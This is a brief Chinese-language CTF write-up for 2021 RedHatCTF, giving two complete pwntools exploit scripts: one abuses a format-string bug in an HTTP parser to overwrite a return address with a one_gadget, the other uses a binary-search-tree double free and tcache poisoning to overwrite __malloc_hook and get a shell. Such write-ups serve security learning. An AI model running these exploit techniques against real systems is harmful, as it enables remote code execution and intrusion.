2021RedHatCTF

比赛的时候只做出来两题。

parse

http parser 有格式化字符串漏洞，改main函数返回地址

#!/usr/bin/python

from pwn import *
context.log_level=logging.INFO
context.terminal=['tmux','new-window']
context.arch='amd64'
LOCAL=0

if LOCAL:
    p=process('./chall')
else:
    p=remote('47.105.94.48',12435)

padding='''POST /1 1
Content-Length: -1
\r
'''

idx=6+0xeb

content=f'%{idx}$lld'.ljust(0x100)

p.sendlineafter('> ',padding+content)
leak=int(p.recvline().decode())
p.success('leak: '+hex(leak))
base=leak-(0x7ffff7a05b97-0x7ffff79e4000)
p.success('base: '+hex(base))



idx=6+0x03
content=f'%{idx}$lld'.ljust(0x100)

p.sendlineafter('> ',padding+content)
leak=int(p.recvline().decode())
p.success('leak: '+hex(leak))
ret_addr=leak+(0x7fffffffe268-0x7fffffffdb7f)
p.success('ret_addr: '+hex(ret_addr))

onegadget=base+0x4f3c2
p.success('onegadget: '+hex(onegadget))


idx=6+0x54
payload=f'%1${((onegadget>>0)&0xff)-1}c%{idx}$hhn'.ljust(0x20).encode()
payload+=p64(ret_addr)
p.sendlineafter('> ',padding.encode()+b' '+payload)

payload=f'%1${((onegadget>>8)&0xff)-1}c%{idx}$hhn'.ljust(0x20).encode()
payload+=p64(ret_addr+1)
p.sendlineafter('> ',padding.encode()+b' '+payload)

payload=f'%1${((onegadget>>8*2)&0xff)-1}c%{idx}$hhn'.ljust(0x20).encode()
payload+=p64(ret_addr+2)
p.sendlineafter('> ',padding.encode()+b' '+payload)


payload=f'%1${((onegadget>>8*3)&0xff)-1}c%{idx}$hhn'.ljust(0x20).encode()
payload+=p64(ret_addr+3)
p.sendlineafter('> ',padding.encode()+b' '+payload)


payload=f'%1${((onegadget>>8*4)&0xff)-1}c%{idx}$hhn'.ljust(0x20).encode()
payload+=p64(ret_addr+4)
p.sendlineafter('> ',padding.encode()+b' '+payload)

payload=f'%1${((onegadget>>8*5)&0xff)-1}c%{idx}$hhn'.ljust(0x20).encode()
payload+=p64(ret_addr+5)
p.sendlineafter('> ',padding.encode()+b' '+payload)

p.sendline('')
p.sendlineafter(':','/bin/bash')
# attach(p,'b *$rebase(0x137D)\nc')


p.interactive()

manager

二叉搜索树删除只有一个孩子的节点时发生double free，tcache attack。

#!/usr/bin/python

from pwn import *
context.log_level=logging.DEBUG
context.terminal=['tmux','new-window']
context.arch='amd64'
LOCAL=0

if LOCAL:
    p=process('./chall')
else:
    p=remote('47.105.94.48',12243)

def add(key):
    p.sendlineafter('> ','1')
    p.sendlineafter('> ',str(key))
    p.sendlineafter('> ','10')
    p.sendlineafter('> ',str(key))

def show():
    p.sendlineafter('> ','3')


def delete(key):
    p.sendlineafter('> ','2')
    p.sendlineafter('> ',str(key))

p.sendlineafter('> ','1')
p.sendlineafter('> ','0')
p.sendlineafter('> ',str(0x500))
p.sendlineafter('> ','')
add(1)
delete(0)
delete(1)
p.sendlineafter('> ','1')
p.sendlineafter('> ','0')
p.sendlineafter('> ',str(0x500))
p.sendlineafter('> ','')
show()
p.recvuntil('content:')
leak=u64(p.recv(6).ljust(8,b'\x00'))
p.success('leak: '+hex(leak))
base=leak-(0x7ffff7dcfc0a-0x7ffff79e4000)
p.success('base: '+hex(base))
malloc_hook=base+(0x7ffff7dcfc30-0x7ffff79e4000)
free_hook=base+(0x7ffff7dd18e8-0x7ffff79e4000)
one_gadget=base+0x10a45c # 0x4f365 0x4f3c2 0x10a45c
delete(0)
show()

add(4)
add(1)
add(3)
add(2)
add(0)
delete(1)
show()


p.sendlineafter('> ','1')
p.sendlineafter('> ','12')  # key
p.sendlineafter('> ','8')  # len
p.sendlineafter('> ',p64(malloc_hook-8))  #content

p.sendlineafter('> ','1')
p.sendlineafter('> ','13')  # key
p.sendlineafter('> ','8')  # len
p.sendlineafter('> ',p64(0xdeadbeef))  #content

realloc=base+(0x7ffff7a7cca0-0x7ffff79e4000)

p.sendlineafter('> ','1')
p.sendlineafter('> ','14')  # key
p.sendlineafter('> ','16')  # len
p.sendlineafter('> ',p64(one_gadget)+p64(realloc+10))  #content

# attach(p)
p.sendlineafter('> ','1')
p.sendlineafter('> ','133')  # key
p.interactive()